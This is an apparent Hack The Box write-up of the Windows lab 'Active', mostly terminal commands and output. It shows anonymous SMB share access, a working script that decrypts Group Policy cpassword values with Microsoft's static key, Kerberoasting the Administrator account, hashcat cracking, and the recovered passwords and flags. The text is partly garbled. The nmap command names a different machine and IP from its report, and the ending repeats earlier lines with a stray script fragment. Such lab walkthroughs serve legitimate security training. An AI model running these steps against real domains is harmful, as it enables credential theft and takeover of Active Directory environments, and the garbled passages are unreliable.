This is a windows machine from hack the box.
nmap -sV -sC -oA sauna 10.10.10.175
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 22:55 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 22.22% done; ETC: 22:56 (0:00:21 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-28 02:55:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-28T02:56:46
|_ start_date: 2023-08-28T02:44:46
|_clock-skew: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.36 seconds
NMAP Scan explained
nmap -sV -sC -oA sauna 10.10.10.175
As per the NMAP website
To reflect those different uses and to simplify the choice of which scripts to run, each script contains a field associating it with one or more categories. Currently defined categories are `auth`, `broadcast`, `default`. `discovery`, `dos`, `exploit`, `external`, `fuzzer`, `intrusive`, `malware`, `safe`, `version`, and `vuln`. These are all described in [the section called “Script Categories”](https://nmap.org/book/nse-usage.html#nse-categories "Script Categories").
Searching for scripts
So in the command - nmap -sV -sC -oA sauna 10.10.10.175
`-sC`: This runs a script scan using the default set of scripts. It's equivalent to `--script=default` and is useful for running a series of basic tests that are generally safe and quick to perform. These scripts include various checks for common vulnerabilities, enumeration tasks, and more. The scripts are part of Nmap's Scripting Engine (NSE).
- `-sV`: This tells Nmap to perform service version detection. Nmap tries to determine the service and version information for each open port it finds. For example, it would not only identify that port 80 is open but also try to determine if it is running Apache or Nginx and which version.
therefor the scripts that are actually run with the two above switches are;
```bash
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse
if you want to check what also is included with the “safe” catagory;
└─$ locate -r '\.nse
so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100
nmap --script safe -p 445 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 06:03 EDT
Pre-scan script results:
| broadcast-dns-service-discovery:
| 224.0.0.251
| 443/tcp hue
| Address=192.168.1.121 fe80::eeb5:faff:fe3f:43f3
| 8009/tcp googlecast
| id=4d2af0de7f5852642fd2d0b454e63b9a
| cd=CFC87D16FF43ADAFB6C7E851317CD8C2
| rm=3DFFE977CB4B85C7
| Address=192.168.1.6
| 10001/tcp googlezone
| Address=192.168.1.6
| 45670/tcp airplay
| acl=0
| deviceid=5C:C1:D7:2B:2C:B2
| features=0x7F8AD0,0x38BCB46
| rsf=0x3
| fv=p20.T-NKLUABC-2410.0
| flags=0x204
| model=UTU8000
| manufacturer=Samsung
| serialNumber=0A363NFN601123T
| protovers=1.1
| srcvers=377.25.06
| pi=22:4C:DA:D7:69:8A
| psi=00000000-0000-0000-0000-224CDAD7698A
| gid=00000000-0000-0000-0000-224CDAD7698A
| Address=192.168.1.92
| 49155/tcp rdlink
| Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| 49155/tcp rdlink
| Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
| 49478/tcp companion-link
| rpMac=0
| rpHN=ac2159579038
| Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
| 51676/tcp companion-link
|_ Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| broadcast-upnp-info:
| 239.255.255.250
| Server: Linux UPnP/1.0 Huawei-ATP-IGD
|_ Location: http://192.168.1.1:37215/upnpdev.xml
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.30s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
|_ 2:1:0
| smb2-time:
| date: 2023-08-28T10:04:15
|_ start_date: 2023-08-28T02:44:46
| smb2-capabilities:
| 2:0:2:
| Distributed File System
| 2:1:0:
| Distributed File System
| Leasing
|_ Multi-credit operations
| dns-blacklist:
| SPAM
|_ l2.apews.org - FAIL
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| port-states:
| tcp:
|_ open: 445
|_fcrdns: FAIL (No PTR record)
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 2s
Post-scan script results:
| reverse-index:
|_ 445/tcp: 10.10.10.100
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds
Nothing much got from the above
Use SMBclient to list shares with nulll password
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient -L //10.10.10.100
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed
└─$ smbmap -r Replication -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Bummer: cannot access local variable 'priv_status' where it is not associated with a value
Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’
The above command did not work
Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (2.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.9 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \>
From ChatGPT
- Groups.xml: The
Groups.xml
file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords. - Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.
Searching for this file after it downloaded with the mget
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate Groups.xml
/home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cd /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ more Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassw
ord="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acct
Disabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
Found a python utility online. The python codo is as below. You need tyo install pycryptodome
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ pip install pycryptodome
Defaulting to user installation because normal site-packages is not writeable
Collecting pycryptodome
Obtaining dependency information for pycryptodome from https://files.pythonhosted.org/packages/40/88/89623388754162ddb82c62814ccbfdbfcc8ed9bd6d5f7412d2479bdca3a7/pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 6.0 MB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.18.0
The python code
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii
def decrypt_cpassword(cpassword):
# Static key used by Microsoft
key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
# Decode the base64 encoded cpassword
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
cpassword_decoded = b64decode(cpassword)
# Decrypt using AES with the static key
cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)
return decrypted.decode('utf16')
# Test with a sample cpassword
cpassword = "YourEncryptedPasswordHere"
print(decrypt_cpassword(cpassword))
Replace the cpassword in the python
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii
def decrypt_cpassword(cpassword):
# Static key used by Microsoft
key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
# Decode the base64 encoded cpassword
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
cpassword_decoded = b64decode(cpassword)
# Decrypt using AES with the static key
cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)
return decrypted.decode('utf16')
# Test with a sample cpassword
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
print(decrypt_cpassword(cpassword))
Run the python script
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ./decode.py
GPPstillStandingStrong2k18
Connect to the shartes using smbclient with the username and the password
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278327 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Aug 27 22:45:51 2023
5217023 blocks of size 4096. 278327 blocks available
smb: \SVC_TGS\Desktop\> cat users.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active.gnmap active.htb active.nmap active.xml decode.py kerbrute users.txt user.txt
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat user.txt
7230de90eec1be42f0ae91ed9e955dca
┌──(kali㉿kali)-[~/HTB/Active]
use the impacket GetUserSPNs.py
└─$ ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-27 22:45:57.011359
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$2baa10b89e539debb3826e895558bb411716440163c0c58732cf720323c9a9aa826a642157ad0d2ba376c95c56afefc1d4bee7a9533630a6dcc04fd9ba8af95c4d25ebe2077c0326a388e77ec446b5cee6791dc59391bb593c123a7d8ad7900666ff52a8abb54bb669975036dbb81b3332dd97030abf678aa05615d2d8a5451438bd5e7a42dbf216af9a9f76e13555b7fe50499506ba21810da519597d02d93f97c3c0a9e46232cd6a42773164e0379856e7a6a79b99e03dc04d8068773671debcf475d1f2e697b7f712a05c80eec8db9c08415334891be5de3fc956d3eec167f2e40b0dd3c1455b963edbd257da9c3294bcdbe5c8e2a5f66fc502c4f4f6eff26789fb44ac74be1a19964e631db761c77ec358125ca2c361956fa2507babb386f287c8f40c6ffad883191f9a5927565251a3fe6b2b284865474622ca1af1165ed868941f0a2a10d2d3be6d00594a7b0de296b56cefa7498e8650b51ef5808ff403901ecf3cf05a32469e0f60f77d2e8a0624a66f3a44739fb156fc56e3067c55cc46656fea04484022190de22832dbb7c0e3df5921be6c401c21a56e39cc96b9a57ff699e69aa96ce0d3031f75b596b349f11b46bbe2270fc3434a294bd4c085ff2713704d1131152603055e683de455f2e15a52ddacede834c80cf172409f68658a8f5db4e46a349b135718218e5cf36aecf830d0515fa580740bd9dbb1fa7488cdc7c57c1f1e0cabc208d581703b812ad69d1e58d4850b1f5015679b63fdfee9dc66720fe83c2662dcf719bd7205aadbebc891b631a13d03561982092636d6cbc56c2ffbcf4bebed14ceeb74898d828dacb93b6fcf07db4d0d972a39f3891ccb09a95a530fbd50f583f0eba35a349a884e65c3d112886e9712f8b9b1af0b359ae30ae2b952e1449d990ea5c34af41dc73ca4b4b9986daa98c1c87ff987fc61a0fa25e16a4799a54c0c5995daf2fba027844d18eb9d6d4cf0986b66e5ee4a536b1385341e63e582c7f7320104a164ee4c63d7c96c22aba031f6c6f90631f2e4a7aaa9e56d52f51352f608c1d538a2f76fddcfd27229b9467d4a36c3c6a252b05f1a7fc691d5722223b8d8d6d44886ed4e93afcd8f98b81ad2d6464c15d0e58315f14c2e46a8335b41dd7fbb5294d57a64881da8c5c667f815f876717498a16e8a2092525a56239e7ae2c60414fedc572d4fe793eadbc06ec516bc60c775c5b65e6e0764b84160d20b55268d3a1e0c59027e96c883c0ecb3aebe
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less
Hash mode #13100
Name................: Kerberos 5, etype 23, TGS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Using hashcat and rockyou
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 13100 /home/kali/HTB/Active/active /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$2baa10b89e539debb3826e895558bb411716440163c0c58732cf720323c9a9aa826a642157ad0d2ba376c95c56afefc1d4bee7a9533630a6dcc04fd9ba8af95c4d25ebe2077c0326a388e77ec446b5cee6791dc59391bb593c123a7d8ad7900666ff52a8abb54bb669975036dbb81b3332dd97030abf678aa05615d2d8a5451438bd5e7a42dbf216af9a9f76e13555b7fe50499506ba21810da519597d02d93f97c3c0a9e46232cd6a42773164e0379856e7a6a79b99e03dc04d8068773671debcf475d1f2e697b7f712a05c80eec8db9c08415334891be5de3fc956d3eec167f2e40b0dd3c1455b963edbd257da9c3294bcdbe5c8e2a5f66fc502c4f4f6eff26789fb44ac74be1a19964e631db761c77ec358125ca2c361956fa2507babb386f287c8f40c6ffad883191f9a5927565251a3fe6b2b284865474622ca1af1165ed868941f0a2a10d2d3be6d00594a7b0de296b56cefa7498e8650b51ef5808ff403901ecf3cf05a32469e0f60f77d2e8a0624a66f3a44739fb156fc56e3067c55cc46656fea04484022190de22832dbb7c0e3df5921be6c401c21a56e39cc96b9a57ff699e69aa96ce0d3031f75b596b349f11b46bbe2270fc3434a294bd4c085ff2713704d1131152603055e683de455f2e15a52ddacede834c80cf172409f68658a8f5db4e46a349b135718218e5cf36aecf830d0515fa580740bd9dbb1fa7488cdc7c57c1f1e0cabc208d581703b812ad69d1e58d4850b1f5015679b63fdfee9dc66720fe83c2662dcf719bd7205aadbebc891b631a13d03561982092636d6cbc56c2ffbcf4bebed14ceeb74898d828dacb93b6fcf07db4d0d972a39f3891ccb09a95a530fbd50f583f0eba35a349a884e65c3d112886e9712f8b9b1af0b359ae30ae2b952e1449d990ea5c34af41dc73ca4b4b9986daa98c1c87ff987fc61a0fa25e16a4799a54c0c5995daf2fba027844d18eb9d6d4cf0986b66e5ee4a536b1385341e63e582c7f7320104a164ee4c63d7c96c22aba031f6c6f90631f2e4a7aaa9e56d52f51352f608c1d538a2f76fddcfd27229b9467d4a36c3c6a252b05f1a7fc691d5722223b8d8d6d44886ed4e93afcd8f98b81ad2d6464c15d0e58315f14c2e46a8335b41dd7fbb5294d57a64881da8c5c667f815f876717498a16e8a2092525a56239e7ae2c60414fedc572d4fe793eadbc06ec516bc60c775c5b65e6e0764b84160d20b55268d3a1e0c59027e96c883c0ecb3aebe:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b3aebe
Time.Started.....: Mon Aug 28 08:18:20 2023 (23 secs)
Time.Estimated...: Mon Aug 28 08:18:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 456.6 kH/s (2.32ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 73%
Started: Mon Aug 28 08:17:46 2023
Stopped: Mon Aug 28 08:18:45 2023
Passwword is Ticketmaster1968
Connect with smbclient
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278043 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Mon Jul 16 06:14:21 2018
.. D 0 Mon Jul 16 06:14:21 2018
AppData DHn 0 Mon Jul 16 06:14:15 2018
Application Data DHSrn 0 Mon Jul 16 06:14:15 2018
Contacts DR 0 Mon Jul 30 09:50:10 2018
Cookies DHSrn 0 Mon Jul 16 06:14:15 2018
Desktop DR 0 Thu Jan 21 11:49:47 2021
Documents DR 0 Mon Jul 30 09:50:10 2018
Downloads DR 0 Thu Jan 21 11:52:32 2021
Favorites DR 0 Mon Jul 30 09:50:10 2018
Links DR 0 Mon Jul 30 09:50:10 2018
Local Settings DHSrn 0 Mon Jul 16 06:14:15 2018
Music DR 0 Mon Jul 30 09:50:10 2018
My Documents DHSrn 0 Mon Jul 16 06:14:15 2018
NetHood DHSrn 0 Mon Jul 16 06:14:15 2018
NTUSER.DAT AHSn 524288 Sun Aug 27 22:45:57 2023
ntuser.dat.LOG1 AHS 262144 Sun Aug 27 23:33:08 2023
ntuser.dat.LOG2 AHS 0 Mon Jul 16 06:14:09 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
ntuser.ini HS 20 Mon Jul 16 06:14:15 2018
Pictures DR 0 Mon Jul 30 09:50:10 2018
PrintHood DHSrn 0 Mon Jul 16 06:14:15 2018
Recent DHSrn 0 Mon Jul 16 06:14:15 2018
Saved Games DR 0 Mon Jul 30 09:50:10 2018
Searches DR 0 Mon Jul 30 09:50:10 2018
SendTo DHSrn 0 Mon Jul 16 06:14:15 2018
Start Menu DHSrn 0 Mon Jul 16 06:14:15 2018
Templates DHSrn 0 Mon Jul 16 06:14:15 2018
Videos DR 0 Mon Jul 30 09:50:10 2018
5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt AR 34 Sun Aug 27 22:45:51 2023
5217023 blocks of size 4096. 278043 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active active.gnmap active.htb active.nmap active.xml decode.py kerbrute root.txt users.txt user.txt
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat root.txt
b74a82c6fd9308eadeb3be8c43a6e766
┌──(kali㉿kali)-[~/HTB/Active]
Root flag b74a82c6fd9308eadeb3be8c43a6e766
| xargs grep categories | grep 'default\|version' | grep smb /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"} /usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
if you want to check what also is included with the “safe” catagory;
so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100
Nothing much got from the above
Use SMBclient to list shares with nulll password
Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed
Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’
The above command did not work
Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””
From ChatGPT
- Groups.xml: The
Groups.xml
file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords. - Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.
Searching for this file after it downloaded with the mget
